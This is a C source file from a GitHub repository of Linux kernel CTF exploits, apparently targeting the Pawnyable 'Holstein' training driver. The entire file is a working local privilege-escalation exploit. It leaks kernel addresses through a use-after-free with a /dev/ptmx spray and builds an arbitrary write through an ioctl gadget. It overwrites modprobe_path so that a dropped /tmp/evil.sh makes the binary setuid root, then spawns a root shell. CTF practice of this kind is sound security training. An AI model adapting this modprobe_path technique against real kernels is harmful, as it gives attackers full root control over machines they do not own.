Linux-Kernel-CTF-exploits/pawnyable_lk013_exploit.c at main · FrancescoLucarini/Linux-Kernel-CTF-exploits · GitHub

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/ioctl.h>

unsigned long kbase, g_buf;
int fd1, fd2;
int overwrite_fd = -1;
int spray[50];


#define module          "/dev/holstein"
#define modprobe        (kbase + 0xe38480)
#define write_gad       (kbase + 0x1b2d06)
#define BUFFER_SIZE     0x400

char buf[BUFFER_SIZE];
unsigned long user_cs, user_ss, user_sp, user_rflags;
void save_state(){
    __asm__(
        ".intel_syntax noprefix;"
        "mov user_cs, cs;"
        "mov user_ss, ss;"
        "mov user_sp, rsp;"
        "pushf;"
        "pop user_rflags;"
        ".att_syntax;"
    );
}

static void get_root(){
    system("echo -e \"#!/bin/sh\nchown root:root /tmp/exploit\nchmod 4555 /tmp/exploit\" > /tmp/evil.sh");
    system("chmod +x /tmp/evil.sh");
    system("echo -e '\xff\xff\xff\xff' > /tmp/pwn");
    system("chmod +x /tmp/pwn");
    system("/tmp/pwn");
    system("/tmp/exploit mhanz");
}

void arb_write(unsigned long addr, unsigned int val){
    if (overwrite_fd == -1){
      *(unsigned long*)&buf[0x3f8] = write_gad;
      *(unsigned long*)&buf[0x18] = g_buf + 0x3f8 - 12*8;
      write(fd2, buf, BUFFER_SIZE);
    }
    if (overwrite_fd == -1){
      for (int i=0; i<50; i++){
        int r = ioctl(spray[i], val, addr);
        if (r != -1) {overwrite_fd = spray[i]; break;}
      }
    }else{
      ioctl(overwrite_fd, val, addr);
    }
}


int main(int argc, char* argv[]){
    if (argc == 2) {
    	printf("getuid(): %d\n", geteuid());
    	setuid(0);
    	setgid(0);
    	system("/bin/sh");
    	return 0;
    }
    save_state();
    fd1 = open(module, O_RDWR);
    fd2 = open(module, O_RDWR);
    if (fd1 == -1 || fd2 == -1){perror("cannot open module\n"); exit(1);}
    close(fd1);
    for (int i=0; i<50; i++) {spray[i] = open("/dev/ptmx", O_RDONLY | O_NOCTTY);}
    read(fd2, buf, BUFFER_SIZE);
    //for (int i=0; i<100; i+=8) printf("Idx: 0x%x => Value: 0x%lx\n", i, *(unsigned long*)&buf[i]);
    kbase = *(unsigned long*)&buf[0x18] -0xc39c60;
    if (kbase % 0x100000 != 0) {perror("leak no good\n"); exit(1);}
    /*write(fd2, "fracchetto",10);
    0xffffa05d81bea400:    66 72 61 63 63 68 65 74  74 6f 00 00 00 00 00 00    |  fracchetto......  |
    */
    g_buf =  *(unsigned long*)&buf[0x38] - 0x38;
    printf("kbase: %lx\n", kbase);
    printf("g_buf: %lx\n", g_buf);
    printf("modprobe_path: %lx\n", modprobe);
    char overwrite[] = "/tmp/evil.sh";
    for (int i = 0; i < sizeof(overwrite); i += 4) {arb_write(modprobe + i, *(unsigned int*)&overwrite[i]);}
    get_root();
    return 0;
}